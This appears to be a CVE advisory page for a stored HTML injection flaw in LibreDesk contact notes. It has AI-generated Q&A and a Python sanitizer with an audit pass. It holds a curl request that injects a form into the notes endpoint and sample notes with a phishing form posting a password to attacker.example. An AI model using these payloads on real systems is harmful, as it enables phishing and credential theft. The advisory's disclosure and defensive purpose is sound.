CVE-2025-68927
Stored HTML Injection in LibreDesk Contact Notes Enables Phishing
Publication date: 2025-12-27
Last updated on: 2025-12-27
Assigner: GitHub, Inc.
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| libredesk | libredesk | 0.8.6-beta |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability in LibreDesk prior to version 0.8.6-beta allows an attacker to perform stored HTML injection via the contact notes feature. Normally, user input is wrapped in `<p>` tags, but by intercepting and modifying the request to remove these tags, an attacker can inject arbitrary HTML elements such as forms and images. These malicious elements are stored and rendered without proper sanitization, enabling attacks like phishing, CSRF-style forced actions, and UI redress attacks.
How can this vulnerability impact me?
The vulnerability can lead to serious security issues including phishing attacks where users may be tricked into submitting sensitive information, CSRF-style forced actions that can manipulate user actions without their consent, and UI redress attacks that can alter the appearance of the interface to deceive users. These impacts can compromise user trust, data integrity, and overall system security.
What immediate steps should I take to mitigate this vulnerability?
The immediate step to mitigate this vulnerability is to upgrade LibreDesk to version 0.8.6-beta or later, where the stored HTML injection issue in the contact notes feature has been patched.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by intercepting and inspecting POST requests to the endpoint `/api/v1/contacts/{id}/notes` and checking whether the note content is wrapped automatically in `<p>` tags, or whether arbitrary HTML elements can be injected by removing those tags. A practical approach is to use a proxy tool like Burp Suite, or curl, and manually modify the POST data to remove the `<p>` tags and insert HTML elements such as `<form>` or `<img>`. For example, send a crafted POST request without `<p>` tags using curl and observe whether the injected HTML is stored and rendered:

```sh
curl -X POST -H "Content-Type: application/json" \
  -d '{"note": "<form><input name=\"test\"></form>"}' \
  https://your-libredesk-instance/api/v1/contacts/{id}/notes
```

If the injected HTML is stored and rendered without sanitization, the system is vulnerable. Additionally, monitoring network traffic for POST requests to this endpoint and checking whether the note content includes unexpected HTML elements can help detect exploitation attempts. [2]
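The server-side counterpart to the mitigation and detection advice above, as an added example that is not LibreDesk's own code: an allowlist sanitizer for note bodies that escapes any tag outside the allowlist (so a `<form>` or `<img>` that arrived by editing the request renders as literal text), plus an audit pass over already-stored notes that flags bodies containing markup the editor would never produce. The allowlist, the href scheme list, the `sanitize_note` and `audit_stored_notes` names and the sample notes are assumptions constructed for this example.

```python
"""Allowlist sanitizer and audit check for contact-note HTML.

Added example for this CVE write-up; it is not LibreDesk's own code. It assumes
notes are stored as an HTML fragment and that only a small set of formatting
tags is legitimate. The allowlist, the href scheme list and the sample notes
are constructed for illustration.
"""
from html import escape
from html.parser import HTMLParser

# Hypothetical allowlist: tags and attributes the note editor is expected to emit.
ALLOWED_TAGS = {"p", "br", "strong", "em", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_HREF_PREFIXES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}


class NoteSanitizer(HTMLParser):
    """Rebuild a fragment keeping allowlisted markup; any other tag is escaped
    so it renders as literal text instead of as an element."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []      # sanitized output pieces
        self.open = []     # allowlisted tags still waiting for a close tag
        self.flagged = []  # disallowed tags seen, in document order

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.flagged.append(tag)
            self.out.append(escape(self.get_starttag_text()))
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue  # drop event handlers, style, id and anything unexpected
            if name == "href" and not value.strip().lower().startswith(SAFE_HREF_PREFIXES):
                continue  # drop javascript:, data: and other unexpected schemes
            kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_startendtag(self, tag, attrs):
        # <br/> style: a start tag, and a close tag only for non-void elements
        self.handle_starttag(tag, attrs)
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag not in ALLOWED_TAGS:
            self.out.append(escape(f"</{tag}>"))
        elif tag in self.open:
            # close everything opened after this tag too, so output stays balanced
            while self.open:
                closed = self.open.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        self.out.append(escape(data))

    def handle_comment(self, data):
        pass  # comments carry no note content; drop them

    def result(self):
        self.close()
        while self.open:  # close tags the input left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize_note(fragment):
    """Return (sanitized_html, disallowed_tags) for one stored note body."""
    parser = NoteSanitizer()
    parser.feed(fragment)
    return parser.result(), parser.flagged


def audit_stored_notes(notes):
    """Detection pass: map note id -> disallowed tags for notes whose stored
    body contains markup the editor would never have produced."""
    findings = {}
    for note_id, body in notes.items():
        disallowed = sanitize_note(body)[1]
        if disallowed:
            findings[note_id] = disallowed
    return findings


# Constructed sample notes: 101 is what the editor normally stores;
# 102 and 103 carry markup that could only arrive by editing the request.
SAMPLE_NOTES = {
    101: "<p>Called customer, will follow up <strong>Monday</strong>.</p>",
    102: '<form action="https://attacker.example/collect"><input name="password"></form>',
    103: '<p>See <a href="javascript:void(0)">ticket</a> <img src="https://attacker.example/logo.png"></p>',
}

if __name__ == "__main__":
    for note_id, body in SAMPLE_NOTES.items():
        clean, bad = sanitize_note(body)
        print(note_id, bad, clean)
```

Escaping rather than stripping the disallowed tags keeps the evidence visible in the rendered note, and running `audit_stored_notes` against the notes table after upgrading surfaces bodies that were injected before the fix was deployed. The sanitizer belongs on the server at the point where the note body is accepted, since the client-side editor wrapping input in `<p>` is exactly the step an intercepting proxy bypasses.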